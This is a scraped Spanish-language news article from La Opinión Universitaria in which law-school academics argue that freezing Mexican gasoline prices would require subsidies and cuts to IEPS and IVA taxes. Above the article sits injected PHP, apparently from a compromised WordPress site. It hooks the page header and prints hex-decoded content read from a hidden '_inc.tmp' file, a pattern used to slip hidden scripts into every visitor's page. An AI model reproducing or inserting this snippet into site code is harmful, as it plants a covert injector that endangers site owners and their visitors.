if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Inviable congelar precios de las gasolinas: académicos  – La Opinión Universitaria La Opinión Universitaria
Menu

Inviable congelar precios de las gasolinas: académicos 

Complicado mantener los precios de los combustibles para evitar un gasolinazo, como lo propuso el virtual presidente electo Andrés Manuel López Obrador, consideraron académicos de la Escuela Libre de Derecho (ELID),

El especialista en temas de economía de esta institución, José Ramón  Campillo Díaz, refirió que para lograr mantener los precios de las gasolinas, al memos durante los primeros tres años de esta administración,  las nuevas autoridades federales deberán aplicar subsidios y disminuir  los impuestos al IEPS y al IVA.

“El discurso siempre es mediático y dista un poco de la realidad, la gasolina tiene impuesto, que son el famoso IEPS  y el IVA que impacta en los precios, una reducción en estos gravámenes puede tener una disminución del precio de la gasolina” explicó.

Agregó que en caso de que la Reforma Energética comenzara a tener resultados eficientes en la producción de los combustibles puede representar una disminución del precio.

En su oportunidad, el maestro José Luis Vallejo, recordó que a la par de la Reforma Energética, nació la Comisión Nacional de Hidrocarburos y la Comisión Reguladora de Energía; que se encargan de regular ante políticas de libre mercado los precios de los combustibles, no obstante señaló que los precios de los combustibles se rigen por los precios internacionales.

“Suponiendo que por cada 18 pesos que cueste el litro de gasolina, 9 pesos son del IEPS, seguramente los van a disminuir para que el costo real no se refleje en el bolsillo del consumidor, para ello tendrán  que recurrir a los subsidios y bajar impuestos”  afirmó.

Al mismo tiempo, dijo que ante la ineficiencia de convertir el combustible en  gasolinas, considero que es viable la reactivación de las refinerías existentes en México. No obstante dijo que se debe de revisar la viabilidad de las mismas antes de abrir otra, además  destacó que deben agilizarse los trabajos al señalar que prácticamente estamos al final de la era de los combustibles fósiles y las refinerías pueden resultar obsoletas con la entrada de nuevas energías y los autos eléctricos.

“Es cierto que se hizo ésta promesa de reactivar las refinerías en campaña, sin embargo, se debe analizar la propuesta, pues puede ser que cuando  ya no se necesite importar tanta gasolina, ya habrá más autos eléctricos”, destacó.

 

  • No comments

    Deja una respuesta

    Tweets recientes